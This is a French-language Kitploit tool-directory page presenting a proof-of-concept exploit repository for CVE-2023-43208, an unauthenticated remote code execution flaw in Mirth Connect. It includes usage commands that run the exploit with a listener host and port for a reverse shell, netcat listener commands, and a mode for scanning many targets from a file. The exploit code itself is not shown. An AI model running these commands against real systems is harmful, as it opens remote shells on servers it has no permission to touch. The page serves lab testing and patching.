Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-2023-43208 — Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1. | Kitploit
Outils/GitHubGitHub/mkirahmet/poc-2023-43208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208-EXPLOIT

Exploit d'exécution de code à distance (RCE) pour Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ POUR USAGE ÉDUCATIF ET EN LABORATOIRE UNIQUEMENT ⚠️

Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.

🚨 AVERTISSEMENT JURIDIQUE IMPORTANT

Cet outil est strictement destiné à :

  • 🧪 Fins éducatives
  • 🔬 Tests de sécurité autorisés dans des environnements de laboratoire
  • 📚 Recherche et apprentissage en cybersécurité

NE PAS UTILISER :

  • ❌ Contre des systèmes qui ne vous appartiennent pas
  • ❌ Sans autorisation écrite explicite
  • ❌ Dans des environnements de production
  • ❌ À des fins illégales ou malveillantes

Vous êtes responsable du respect de toutes les lois et réglementations applicables. Une mauvaise utilisation de cet outil peut entraîner des poursuites pénales.

📋 Description

Cet exploit cible la vulnérabilité de désérialisation XML dans le point de terminaison /api/users de Mirth Connect, permettant une exécution de code à distance sans authentification sur les versions concernées (< 4.4.1).

Il s'agit d'une vulnérabilité CRITIQUE et elle ne doit être testée QUE dans des environnements de laboratoire isolés avec vos propres systèmes.

🔧 Prérequis

  • Python 3.7 ou supérieur
  • Paquets requis listés dans requirements.txt
  • UN ENVIRONNEMENT DE LABORATOIRE avec une instance Mirth Connect vulnérable

🚀 Installation

Clonez le dépôt

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Installez les prérequis

pip install -r requirements.txt 💻 Utilisation (LAB UNIQUEMENT) Mode interactif (recommandé en laboratoire) bash python exploit.py Mode ligne de commande bash

Exploitation d'une cible unique (LAB UNIQUEMENT)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

Analyse de plusieurs cibles à partir d'un fichier (LAB UNIQUEMENT)

python exploit.py -f targets.txt -t 50 -o vulnerable.txt

Mode non interactif (LAB UNIQUEMENT)

python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Options text -u, --url URL cible à exploiter (LAB UNIQUEMENT) -lh, --lhost Hôte d'écoute (votre IP) -lp, --lport Port d'écoute -f, --file Fichier contenant les URL cibles à analyser -o, --output Fichier de sortie pour enregistrer les résultats d'analyse -t, --threads Nombre de threads pour l'analyse (défaut : 50) --no-interactive Exécution en mode non interactif

🎯 Exemple d'environnement de laboratoire

Configurez votre laboratoire :

Installez une version vulnérable de Mirth Connect (< 4.4.1) dans une VM isolée

Utilisez un réseau contrôlé (ex. NAT/Host-only dans VirtualBox/VMware)

Ne l'exposez jamais à Internet

Démarrez votre listener :

ncat -lnvp 4444

ou

nc -lnvp 4444

Exécutez l'exploit dans votre laboratoire :

python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

🧪 Exigences de l'environnement de test

  • Réseau/VLAN isolé
  • Machines virtuelles uniquement
  • Aucune donnée de production
  • Règles de pare-feu bloquant l'accès externe
  • Autorisation appropriée documentée

📝 Détails techniques

Type de vulnérabilité : RCE par désérialisation XML

Versions concernées : Mirth Connect < 4.4.1

Version corrigée : 4.4.1 et ultérieures

Score CVSS : 9.8 (Critique)

Vecteur d'attaque : Réseau

Authentification : Aucune requise

L'exploit utilise des gadgets Commons Collections pour parvenir à une RCE via le point de terminaison /api/users.

🛡️ Mesures de protection

Si vous utilisez Mirth Connect :

  • ✅ Mettez à jour vers la version 4.4.1 ou une version ultérieure
  • ✅ Restreignez l'accès réseau aux interfaces d'administration
  • ✅ Mettez en place une authentification appropriée
  • ✅ Surveillez les charges utiles XML suspectes

👥 Crédits

Auteurs originaux : K3ysTr0K3R & Chocapikk Modifié par : M0h4 CVE : CVE-2023-43208

⚠️ AVERTISSEMENT FINAL

╔══════════════════════════════════════════════════════════════╗ ║ CE LOGICIEL EST RÉSERVÉ AU LAB UNIQUEMENT ║ ║ Toute utilisation non autorisée est ILLÉGALE ║ ║ Vous assumez TOUS les risques et responsabilités ║ ║ L'auteur décline TOUTE responsabilité en cas d'abus ║ ╚══════════════════════════════════════════════════════════════╝

Télécharger l’outil